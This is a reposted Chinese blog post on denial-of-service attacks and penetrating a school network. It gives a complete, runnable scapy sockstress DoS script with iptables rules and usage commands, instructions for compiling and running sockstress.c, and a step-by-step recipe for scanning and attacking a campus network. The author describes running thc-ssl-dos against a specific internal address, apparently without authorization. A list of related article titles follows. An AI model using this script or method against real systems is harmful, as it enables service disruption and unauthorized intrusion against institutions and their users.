Dos攻击和校网渗透
为了证明我还活着,话不多说
Dos攻击脚本(这是一个sockstrees Dos脚本)
1 #-*- coding:utf-8 -*- 2 from scapy.all import * 3 from time import sleep 4 import thread 5 import logging 6 import os 7 import signal 8 import sys 9 10 from scapy.layers.inet import IP,TCP 11 12 logging.getLogger("scapy.runtime").setLevel(logging.ERROR) 13 14 if len(sys.argv) != 4: 15 print("用法: ./sock_stress.py [目标IP] [端口] [线程数]") 16 print("举例: ./scok_stress.py [1.1.1.1] 20 ##攻击端口处于开放状态") 17 sys.exit() 18 19 target = str(sys.argv[1]) 20 dstport = int(sys.argv[2]) 21 threads = int(sys.argv[3]) 22 23 ##攻击函数 24 def sock_stress(target,dstport): 25 while 0 == 0: 26 try: 27 x = random.randint(0,65535) 28 response = sr1(IP(dst=target)/TCP(sport=x,dport=dstport,flags='S'),timeout=1,verboss=0) 29 send(IP(dst=target)/TCP(dport=dstport,sport=x,window=0,flags='A',ack=(response[TCP].seq+1))/'\x00\x00',verboss=0) 30 except: 31 pass 32 ##停止攻击函数 33 def shutdown(signal,frame): 34 print("正在恢复 ipables 规则") 35 os.system('iptables -D OUTPUT -p tcp --tcp-flags RST -d' + target +' -j DROP') 36 sys.exit() 37 38 ##添加iptables规则 39 40 os.system('iptables -A OUTPUT -p tcp --tcp-flags RST RST -d ' + target + ' -j DROP') 41 signal.signal(signal.SIGINT,shutdown) 42 43 ##多线程攻击 44 print("\n攻击正在进行...按 Ctrl+C 停止攻击") 45 for x in range(0,threads): 46 thread.start_new_thread(sock_stress,(target,dstport)) 47 48 ##永远执行 49 while 0==0: 50 sleep(1)
View Code
一、./sockstrees(产看使用方法)
二、./sockstress.py [ip] [port] 200
三、iptables -A OUTPUT -p TCP --tcp-flags rst rst -d 1.1.1.1 -j DROP(手动添加ip)
四、iptables -L (查看增添的ip)
------------------------------------------------------------------------------------------------
关于大神的攻击程序sockstress.c
一、安装:gcc -Wall -c sockstress.c
编译:gcc -pthread -o sockstress sockstress.o
二、指令:./sockstress [ip]:[port] eth0 10
(特别好用)
------------------------------------------------------------------------------------------------
关于校网渗透
一、dig 学校域名
二、nmap -v [ip](准备已知的所有ip,逐个分析)
三、尝试开放端口
四、尝试攻击
(我尝试攻击指令:thc-ssl-dos 172.18.36.254 80 --accpet 这是关于TCP的握手资源的攻击,可惜我的第一次攻击失败。。。)
个人网站:http://www.tonyplot.xyz
转载于:https://www.cnblogs.com/money131/p/11122326.html
Dos攻击和校网渗透相关推荐
- 内网渗透测试:NTLM Relay攻击分析
目录 基础知识 NTLM认证过程 NTLM中继攻击原理 获得Net-NTLM Relay的思路 利用LLMNR和NetBIOS欺骗获得Net-NTLMHash 利用WPAD劫持获得Net-NTLMHa ...
- windows内网渗透PTH/PTK攻击
前言 windows内网渗透中,有三种最常用的pass系列攻击: pass the hash(hash传递攻击,简称pth) pass the ticket(票据传递攻击,简称ptt) pass th ...
- 内网渗透建立代理通道(如何攻击目标内网机器?)-Socks代理(゚益゚メ) 渗透测试
文章目录 搭建靶场 配置虚拟机网络 虚拟机 上线目标1(Target1) Socks代理 简介 正向代理 反向代理 FRP 一层代理 二层代理(多层代理) EW 正向代理 反向代理 二层代理流量转发 ...
- Windows 内网渗透之攻击域控
文章目录 内网渗透之攻击域控 前言 高权限读取本地密码 procdump+mimikatz绕过杀软 SYSVOL组策略获取密码 Kerberoasting 暴力破解密码 原理 使用setspn查询sp ...
- 内网渗透之PPT票据传递攻击(Pass the Ticket)
文章目录 内网渗透之PPT票据传递攻击(Pass the Ticket) 前言 Kerberos 协议& Kerberos 认证原理 Kerberos 认证原理 ASREQ & ASR ...
- Linux kali内网渗透之ARP断网攻击
Linux kali内网渗透之ARP断网攻击 ARP断网攻击 如果你的kali是虚拟机 ,请将其设置为网络桥接模式,这样才和内网在同一网段 如果你的kali里没有安装arpspoof,请在终端输入如下 ...
- CVE-2018-8174漏洞复现及内网渗透攻击
文章目录 说明 CVE-2018-8174漏洞简介 Persistence后门 环境搭建 拓扑图 Win server 2008 对Windows 7开启1433端口 内网攻击过程 1号机获得2号机的 ...
- 内网渗透(五十二)之域控安全和跨域攻击-搭建和查看域信任关系
系列文章第一章节之基础知识篇 内网渗透(一)之基础知识-内网渗透介绍和概述 内网渗透(二)之基础知识-工作组介绍 内网渗透(三)之基础知识-域环境的介绍和优点 内网渗透(四)之基础知识-搭建域环境 内 ...
- 内网渗透(五十三)之域控安全和跨域攻击-利用域信任密钥获取目标域控
系列文章第一章节之基础知识篇 内网渗透(一)之基础知识-内网渗透介绍和概述 内网渗透(二)之基础知识-工作组介绍 内网渗透(三)之基础知识-域环境的介绍和优点 内网渗透(四)之基础知识-搭建域环境 内 ...
最新文章
- squid代理(传统代理)
- ESP8266编译脚本之四
- boost::statechart模块实现使用正交状态和 state_downcast 查询正交区域的状态的测试程序
- MDN文档基础知识搜集
- 盐噪声和胡椒噪声的区别_为什么加一点盐对您的密码很有用(但不包括胡椒粉!)
- java 位运算取8位_Java 9 AOT 试用:仅支持 64 位 Linux和java.base 模块编译
- 因为有人说的WZ132
- 一个机房的所有计算机联成的网络应是,根据分布范围,一个机房的所有计算机联成的网络应是( )。...
- python中property干什么用的?
- 网页上的播放器相关参数说明
- 宽带拨号上服务器无响应,宽带拨号服务器无响应(图文)
- 2019.07.23--运用三W法则初步学习SpringCloud基础知识
- python排版_Python|图形排版
- 浩哥的Linux学习笔记之touch命令
- 云计算工程师面试题集锦,常见云计算面试题及答案
- 多元正态分布的后验采样
- C/C++基础 sleep()、usleep()、nanosleep()的用法
- setting中的各种设置
- AAA学习-本地local
- Google Earth Engine(GEE)——User memory limit exceeded(2)
热门文章
- R语言临床预测模型的评价指标与验证指标实战:ROC曲线、AUC(C-Statistics)
- 代码随想录算法训练营第二天| 977. 有序数组的平方、209.长度最小的子数组、59.螺旋矩阵II 。
- 盘点:2017年我国科技创新十大里程碑事件
- 区块链让奢侈品的分销、溯源不再是难题
- 计算机硬盘正在工作时,让硬盘永远工作在最佳状态
- 用计算机来弹洪荒之力,如果不会支撑,纵使有“洪荒之力”也弹不强
- Dictionary
- 前端知识总结之网络基础
- 【Java继承】编程练习:水果的信息描述
- 计算机监控如何控制调速器的,《计算机监控系统》PPT课件.ppt